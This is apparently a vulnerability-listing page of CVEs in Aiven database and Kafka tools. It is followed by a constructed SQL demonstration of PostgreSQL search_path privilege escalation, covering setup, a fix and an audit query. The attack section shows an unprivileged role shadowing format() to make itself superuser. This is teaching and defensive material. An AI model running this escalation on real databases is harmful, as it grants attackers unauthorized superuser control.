Aiven Open
Recent CVEs
| CVE | Vendor / Product | Sev | Risk | CVSS | EPSS | KEV | Published | Description |
|---|---|---|---|---|---|---|---|---|
| CVE-2025-61673 | Aiven / Karapace | High | 0.56 | 8.6 | 0.00 | — | Oct 3, 2025 | Karapace is an open-source implementation of Kafka REST and Schema Registry. Versions 5.0.0 and 5.0.1 contain an authentication bypass vulnerability when configured to use OAuth 2.0 Bearer Token authentication. If a request is sent without an Authorization header, the token… |
| CVE-2025-31480 | Aiven / aiven-extras | Critical | 0.52 | 9.1 | 0.00 | — | Apr 4, 2025 | aiven-extras is a PostgreSQL extension. This is a privilege escalation vulnerability, allowing elevation to superuser inside PostgreSQL databases that use the aiven-extras package. The vulnerability leverages the format function not being schema-prefixed. Affected users should… |
| CVE-2026-23529 | Aiven / Kafka Connect BigQuery Connector | High | 0.50 | 7.7 | 0.00 | — | Jan 16, 2026 | Kafka Connect BigQuery Connector is an implementation of a sink connector from Apache Kafka to Google BigQuery. Prior to 2.11.0, there is an arbitrary file read in Google BigQuery Sink connector. Aiven's Google BigQuery Kafka Connect Sink connector requires Google Cloud… |
| CVE-2026-45080 | Aiven / Klaw | Medium | 0.45 | — | 0.00 | — | Jun 2, 2026 | Klaw is a self-service Apache Kafka Topic Management/Governance tool/portal. Prior to version 2.10.4, improper access control allows disclosure of password hash. This issue has been patched in version 2.10.4. |
| CVE-2026-39961 | Aiven / Aiven Operator | Medium | 0.37 | 6.8 | 0.00 | — | Apr 9, 2026 | Aiven Operator allows you to provision and manage Aiven Services from your Kubernetes cluster. From 0.31.0 to before 0.37.0, a developer with create permission on ClickhouseUser CRDs in their own namespace can exfiltrate secrets from any other namespace — production database… |
| CVE-2024-56142 | Aiven / pghoard | Medium | 0.35 | 6.5 | 0.00 | — | Dec 17, 2024 | pghoard is a PostgreSQL backup daemon and restore tooling that stores backup data in cloud object stores. A vulnerability has been discovered that could allow an attacker to acquire disk access with privileges equivalent to those of pghoard, allowing for unintended path… |
| CVE-2026-44367 | Aiven / Klaw | Low | 0.18 | 2.7 | 0.00 | — | Jun 2, 2026 | Klaw is a self-service Apache Kafka Topic Management/Governance tool/portal. Prior to version 2.10.4, a vulnerability exists in the user registration and login mechanisms due to inconsistent handling of username case sensitivity, leading to a targeted Denial of Service (DoS) and… |
| CVE-2026-54711 | Aiven / — | Low | 0.00 | — | — | — | Jun 18, 2026 | Impact: When using .pgpass, database connection information including the username and password will be logged at the debug level. Patches: Upgrade to version 2.7.1 or greater. Workarounds: Filter out debug-level logs. References: This issue was discovered by… |
| CVE-2026-29190 | Aiven / Karapace | — | 0.00 | — | 0.00 | — | Mar 7, 2026 | Karapace is an open-source implementation of Kafka REST and Schema Registry. Prior to version 6.0.0, there is a Path Traversal vulnerability in the backup reader (backup/backends/v3/backend.py). If a malicious backup file is provided to Karapace, an attacker may exploit… |
| CVE-2026-25999 | Aiven / Klaw | — | 0.00 | — | 0.00 | — | Feb 11, 2026 | Klaw is a self-service Apache Kafka Topic Management/Governance tool/portal. Prior to 2.10.2, there is an improper access control vulnerability that allows unauthorized users to trigger a reset or deletion of metadata for any tenant. By sending a crafted request to the… |
| CVE-2025-67745 | Aiven / MyHoard | — | 0.00 | — | 0.00 | — | Dec 18, 2025 | MyHoard is a daemon for creating, managing and restoring MySQL backups. Starting in version 1.0.1 and prior to version 1.3.0, in some cases, myhoard logs the whole backup info, including the encryption key. Version 1.3.0 fixes the issue. As a workaround, direct logs into… |
| CVE-2025-55283 | Aiven / aiven-db-migrate | — | 0.00 | — | 0.01 | — | Aug 18, 2025 | aiven-db-migrate is an Aiven database migration tool. Prior to 1.0.7, there is a privilege escalation vulnerability that allows elevation to superuser inside PostgreSQL databases during a migration from an untrusted source server. The vulnerability stems from psql executing… |
| CVE-2025-55282 | Aiven / aiven-db-migrate | — | 0.00 | — | 0.01 | — | Aug 18, 2025 | aiven-db-migrate is an Aiven database migration tool. Prior to 1.0.7, there is a privilege escalation vulnerability that allows a user to elevate to superuser inside PostgreSQL databases during a migration from an untrusted source server. By exploiting a lack of search_path… |
| CVE-2023-51390 | Aiven / journalpump | — | 0.00 | — | 0.00 | — | Dec 20, 2023 | journalpump is a daemon that takes log messages from journald and pumps them to a given output. A logging vulnerability was found in journalpump which logs out the configuration of a service integration in plaintext to the supplied logging pipeline, including credential… |
| CVE-2023-32305 | Aiven / aiven-extras | — | 0.00 | — | 0.01 | — | May 12, 2023 | aiven-extras is a PostgreSQL extension. Versions prior to 1.1.9 contain a privilege escalation vulnerability, allowing elevation to superuser inside PostgreSQL databases that use the aiven-extras package. The vulnerability leverages missing schema qualifiers on privileged… |
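Four of the entries above (CVE-2023-32305, CVE-2025-31480, CVE-2025-55282, CVE-2025-55283) are the same PostgreSQL bug class: a privileged (SECURITY DEFINER or superuser-run) routine calls a built-in such as `format()` without a `pg_catalog.` prefix and without pinning `search_path`, so an unprivileged role that can create objects in a schema on the caller's search path can shadow the built-in and have its own body executed with the definer's privileges. The script below is an added, constructed illustration of that class, not code from aiven-extras or aiven-db-migrate, and it says nothing about the exact call sites those advisories fixed. Every object name in it (`demo_vulnerable`, `demo_fixed`, the role `attacker`) is hypothetical. The setup and fix sections run as a superuser; the attack section runs as `attacker`.

```sql
-- Constructed demo of the unqualified-function / search_path privilege
-- escalation class. Not aiven-extras or aiven-db-migrate code; all names are
-- hypothetical. Tested pattern is the one documented for CVE-2018-1058.

-- 1. Setup (as superuser): a SECURITY DEFINER helper that calls format()
--    unqualified and does not pin its own search_path.
CREATE ROLE attacker LOGIN PASSWORD 'attacker';
-- PostgreSQL 15+ no longer grants CREATE on public to PUBLIC; older defaults
-- (and many migrated databases) already allow this.
GRANT CREATE ON SCHEMA public TO attacker;

CREATE FUNCTION demo_vulnerable(who text) RETURNS text
LANGUAGE plpgsql SECURITY DEFINER AS $$
BEGIN
  -- format() is resolved through the CALLER's search_path when executed,
  -- but the body runs with the OWNER's (superuser) privileges.
  RETURN format('hello %s'::text, who);
END;
$$;
GRANT EXECUTE ON FUNCTION demo_vulnerable(text) TO attacker;

-- 2. Attack (as attacker). pg_catalog is searched first, but function
--    resolution prefers an exact argument-type match: pg_catalog.format is
--    declared format(text, VARIADIC "any"), so a public.format(text, text)
--    is the exact match for this call and wins. Its body then executes as
--    the definer of demo_vulnerable.
CREATE FUNCTION public.format(fmt text, arg text) RETURNS text
LANGUAGE plpgsql AS $$
BEGIN
  ALTER ROLE attacker SUPERUSER;   -- runs as the superuser owner
  RETURN 'shadowed';
END;
$$;
SELECT demo_vulnerable('world');                         -- 'shadowed'
SELECT rolsuper FROM pg_roles WHERE rolname = 'attacker'; -- true

-- 3. Fix (as superuser): pin search_path on the definer function AND
--    schema-qualify the built-in. Pinning covers anything the body calls
--    indirectly; qualifying makes the intent obvious in review.
CREATE OR REPLACE FUNCTION demo_fixed(who text) RETURNS text
LANGUAGE plpgsql SECURITY DEFINER
SET search_path = pg_catalog, pg_temp
AS $$
BEGIN
  RETURN pg_catalog.format('hello %s'::text, who);
END;
$$;

-- 4. Audit: list every SECURITY DEFINER function in this database that does
--    not set search_path. Each one is a candidate for this bug class.
SELECT p.oid::regprocedure AS function, r.rolname AS owner
FROM pg_proc p
JOIN pg_roles r ON r.oid = p.proowner
WHERE p.prosecdef
  AND NOT EXISTS (
        SELECT 1
        FROM unnest(coalesce(p.proconfig, '{}'::text[])) AS c
        WHERE c LIKE 'search_path=%'
      )
ORDER BY 1;

-- 5. Cleanup of the demo objects.
DROP FUNCTION public.format(text, text);
DROP FUNCTION demo_vulnerable(text);
ALTER ROLE attacker NOSUPERUSER;
```

Two details matter in practice. First, "pg_catalog is implicitly searched first" is not a defence on its own: name resolution keeps candidates from every schema on the path and picks the exact type match, which is why the variadic `pg_catalog.format` loses to a two-`text`-argument shadow. Second, `pg_temp` must come last in the pinned path, because any role can create objects in its own temporary schema, so listing it earlier reopens the same hole. Revoking `CREATE ON SCHEMA public FROM PUBLIC` (the PostgreSQL 15 default) removes the attacker's usual foothold but does not protect a definer function against roles that own any other schema on the caller's path.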